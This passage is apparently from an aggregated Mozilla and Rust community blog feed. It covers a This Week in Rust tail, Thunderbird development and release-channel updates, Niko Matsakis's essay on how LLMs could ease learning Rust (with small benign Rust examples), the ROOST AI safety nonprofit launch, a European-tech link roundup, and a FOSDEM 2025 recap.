  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-12 - 2025-03-12 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Just because things are useful doesn't mean they are magically sound.

Ralf Jung on github

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdThunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at FOSDEM recently. We talked about standards, problems, solutions and everything in between. However, the most satisfying part of the weekend was standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help in finding or implementing solutions to some of the meatier topics such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

Despite a reduction in team capacity for part of January, the team was able to complete work on the following tasks, which form some of the final stages of our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Download EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more, which can be followed via the Meta bug & progress tracking. Watch out for this feature being unveiled in daily and beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko MatsakisHow I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. When I talk to people within Amazon about adopting Rust, the perceived complexity and fear of its learning curve are the biggest hurdle. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at a very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phrase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there’s a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is not authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.
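
To make the fix we settled on concrete, here is a minimal sketch of where the clone ends up (the log_request stub is hypothetical; the key point is that the owned String is created before the async move block, so the spawned task owns its data and no borrow escapes the function):

fn log_request(message: &str) {
    // Hypothetical stand-in for the real logging call.
    println!("logging: {message}");
}

async fn log_request_in_background(message: &str) {
    // Clone the borrowed &str into an owned String *before* spawning,
    // so the spawned task owns the data for as long as it needs it.
    let message = message.to_string();
    tokio::spawn(async move {
        log_request(&message);
    });
}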

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error, tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.
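
As a sketch of the two directions (the surrounding Person type and the second method name are invented for illustration), the choice is between changing the body to match the elided signature, or changing the signature to match the body:

struct Person {
    name: String,
}

impl Person {
    // Fix A: keep the elided signature (the returned &str borrows from
    // `self`) and change the body so it really does return self's data.
    fn get_first_name(&self, _alias: &str) -> &str {
        &self.name
    }

    // Fix B: keep the body and change the signature so the returned
    // reference is explicitly tied to `alias` rather than `self`.
    fn get_first_name_from_alias<'a>(&self, alias: &'a str) -> &'a str {
        alias
    }
}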

Translating idioms from one language to another

People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.
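
As an illustration of the enum-plus-match shape that often replaces a Java-style visitor (the expression type below is hypothetical):

// A small expression tree; a Java codebase might model this with a
// Visitor interface that has one method per node type.
enum Expr {
    Num(i64),
    Add(Box<Expr>, Box<Expr>),
    Neg(Box<Expr>),
}

// In Rust the "visit" is usually just a match. The compiler checks
// that every variant is handled, and adding a variant later forces
// every match site to be revisited.
fn eval(e: &Expr) -> i64 {
    match e {
        Expr::Num(n) => *n,
        Expr::Add(a, b) => eval(a) + eval(b),
        Expr::Neg(inner) => -eval(inner),
    }
}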

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.
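
Here is a minimal sketch of that kind of split, with made-up names. Before the refactoring, calling a &mut self logging method while iterating another field trips the borrow checker; pulling the logging state into its own struct (and moving the method onto it) makes the disjoint borrows visible:

// Hypothetical substruct holding just the logging state, so it can be
// borrowed mutably while other fields of `Engine` are borrowed shared.
struct Logger {
    entries: Vec<String>,
}

impl Logger {
    // Moved here from `Engine` as part of the split.
    fn log(&mut self, msg: &str) {
        self.entries.push(msg.to_string());
    }
}

struct Engine {
    items: Vec<String>,
    logger: Logger,
}

impl Engine {
    fn process(&mut self) {
        // `self.items` and `self.logger` are distinct fields, so the
        // shared borrow of one and the mutable borrow of the other coexist.
        for item in &self.items {
            self.logger.log(item);
        }
    }
}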

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to clean up your code. With the upcoming Rust 2024 edition, cargo fix --edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit, if the destructor happens to be a lock guard or something with side effects. In practice when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the name of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it better, and it could ask questions if it was feeling unsure.
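
For a concrete sketch of the kind of case being described (the cache is hypothetical): under the 2021 edition rules, the temporary lock guard created in an if let scrutinee lives until the end of the whole if/else expression, so the second lock() below can deadlock; under the Rust 2024 rules the guard is dropped before the else branch runs. Whether any particular occurrence of this pattern actually matters is exactly the kind of judgment call discussed above.

use std::sync::Mutex;

// The temporary MutexGuard produced by `cache.lock().unwrap()` in the
// `if let` scrutinee is what changes between editions: it is held across
// the `else` branch in 2021 (so the second lock may deadlock) and dropped
// before the `else` branch in 2024.
fn last_or_insert_default(cache: &Mutex<Vec<String>>) -> String {
    if let Some(last) = cache.lock().unwrap().last() {
        last.clone()
    } else {
        cache.lock().unwrap().push("default".to_string());
        "default".to_string()
    }
}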

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question: suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow. How do you make it faster? Or, even worse, suppose that you are trying to tune your network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions (from Emery Berger’s group at UMass, the professor I talked about earlier).

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true way more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12
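
To make the contrast concrete, here is roughly what the “shallow but correct” path produces on a hypothetical enum: the fill-match-arms assist lists every variant exactly, but each body is a placeholder that a human (or, with deeper integration, an LLM) still has to write.

enum Shape {
    Circle { radius: f64 },
    Rect { width: f64, height: f64 },
}

fn area(shape: &Shape) -> f64 {
    // The arm list as a tool like rust-analyzer would generate it:
    // exhaustive and correctly named, but with placeholder bodies.
    match shape {
        Shape::Circle { radius } => todo!(),
        Shape::Rect { width, height } => todo!(),
    }
}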

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model, they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigious energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As far as the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling servants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right I did make a mistake, here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM like an “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed to the LLM in the background but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla BlogROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike, ensuring that a broad set of stakeholders have a vested interest in its success. This is critical to building the accessible, scalable and resilient safety infrastructure all of us need for the AI era.

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support by technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges such as eliminating child sexual abuse material (CSAM) from AI datasets and models. 

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated  “when it comes to AI Safety and Security, openness is an antidote not a poison.” 

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (which was an official event on the road to the French AI Action Summit happening this week), brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of  the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community. 

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Don Martithe #Eurostack, so hot right now

Is it just me or is it all about Europe right now? Put on some Kraftwerk and follow along I guess.

Fedora Chooses Forgejo! This is GitHub-like project hosting software with version control, issues, pull requests, all the usual stuff. I have a couple of small projects on Codeberg, which is the (EU) hosted nonprofit instance and it works fine as far as I can tell. Also a meissa GmbH presentation at FOSDEM 2025 You know X, Facebook, Xing, SourceForge? What about GitHub? It is time to de-risk OpenSource engagement!

Lots more Europe-hosted SaaS, too. Baldur Bjarnason has more info on Todo notes as a storm approaches

The Sovereign Tech Agency is supporting some Linux plumbing: Arun Raghavan: PipeWire ♥ Sovereign Tech Agency.

The northern German state of Schleswig-Holstein is moving 30,000 PCs from Microsoft Windows and Office to Linux and LibreOffice: LibreOffice at the Univention Summit 2025 I know, I know, “government in Germany goes desktop Linux” is the “hey, Rocky, watch me pull a rabbit out of my hat” of IT, but this time they’re not up against Microsoft in its prime, they’re up against a new generation that can’t open their old files, while LibreOffice can.

They Said It Couldn’t Be Done by Pierre-Carl Langlais, Anastasia Stasenko, and Catherine Arnett. These represent the first ever models trained exclusively on open data, meaning data that are either non-copyrighted or are published under a permissible license. Trained on the Jean Zay supercomputer. Related: Pirate Libraries Are Forbidden Fruit for AI Companies. But at What Cost?

Scott Locklin lists Examples of group madness in technology. One of the worst arguments I hear is that thing X is inevitable because the smart people are doing it. As I’ve extensively documented over the last 15 years on this blog, smart people in groups are not smart and are even more subject to crazes and mob behavior than everyone else.

Not a European product: Framework Laptop’s RISC-V board for open source diehards is available for $199 but there is a Europe angle here. European Union Seeks Chip Sovereignty Using RISC-V - EE Times, RISC-V Summit Europe. RISC-V holds significance for Europe due to its potential to foster innovation, enhance technological sovereignty, and stimulate economic growth within the region. By embracing RISC-V, European countries can reduce their dependency on foreign technologies and proprietary architectures, thereby enhancing their autonomy in critical sectors such as telecommunications, cybersecurity, and data processing.

Also international, not Europe-specific: Postgres full-text search is Good Enough! by Rachid Belaid. (But there is a tech autonomy angle, and an active PostgreSQL Europe, so for practical purposes PostgreSQL is part of the Eurostack.)

Good advice from tante/Jürgen Geuter: Innovation is a distraction The demand for more Innovation (and sometimes even the request for more research) has become a way to legitimize not doing anything. A way to say the unpleasant solutions we have are not perfect but in the future there might be a magic solution that doesn’t bother us and everyone gets a fucking unicorn.

Marloes de Koning interviews Cristina Caffarra. ‘We have to get to work and put Europe first. But we are late. Terribly late’ You really don’t have to buy everything in Europe, says the competition expert, who is familiar with the criticism that the American supply is simply superior. But start with 30 percent of your procurement budget in Europe. That already makes a huge difference. (That seems like an easy target. Not only are way more than 30 percent of the European Alternatives up to a serviceable level by now, but unfortunately a lot of the legacy US vendors are having either quality or compliance problems, or both. The risks, technical and otherwise, keep going up.)

Greg Nojeim and Silvia Lorenzo Perez cover Trump’s Sacking of PCLOB Members Threatens Data Privacy. Aside from its importance in protecting civil liberties, the PCLOB cannot play its key role in enforcing U.S. obligations under the EU-U.S. Data Privacy Framework (DPF) while it lacks a quorum of members. The European Commission would lose a key oversight tool for which it bargained, and the adequacy decision that it issued to support the DPF could be struck down under review at the Court of Justice of the European Union (CJEU), which struck down two predecessor EU-U.S. data privacy arrangements, the Safe Harbor Agreement and the Privacy Shield.

Karl Bode writes, Apple Has To Pull Its “AI” News Synopses Because They Were Routinely Full Of Shit (If the features unavailable in Europe are problematic anyway…)

Sarah Perez covers Report: Majority of US teens have lost trust in Big Tech. Common Sense says that 64% of surveyed U.S. teens don’t trust Big Tech companies to care about their mental health and well-being and 62% don’t think the companies will protect their safety if it hurts profits. Over half of surveyed U.S. teens (53%) also don’t think major tech companies make ethical and responsible design decisions (think: the growing use of dark patterns in user interface design meant to trick, confuse, and deceive). A further 52% don’t think that Big Tech will keep their personal information safe and 51% don’t think the companies are fair and inclusive when considering the needs of different users. (What if the Eurostack becomes the IT version of those European food brands that sell well in other countries too?)

Mozilla Thunderbird: Thunderbird Desktop Release Channel Will Become Default in March 2025

UPDATE (March 4, 2025): The Release Channel is now default! See our update post on how to make the switch with a manual install and what’s new in 136.

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel. It will provide monthly major releases instead of annual major releases. This provides several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase daily active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 daily active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on these release process changes, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement at our Thunderbird Planning mailing list

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

About:Community: FOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025

Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM wasn’t just another tech gathering. It is a representation of a vibrant community, open source innovation, and the spirit of collaboration. And we’re proud to have been part of this amazing event since its inception.

This year, FOSDEM celebrated its 25th anniversary. And unlike the gloomy weather of previous years, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge at Mozilla’s and Thunderbird’s stands, where participants could play to win exclusive Mozilla t-shirts and many more pieces of special swag. It was a really fun way to introduce many projects from across Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Castelluccio presented a talk in the main track about the usage of LLMs to support Firefox developers with code review.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey using the getaddrinfo API in Firefox.
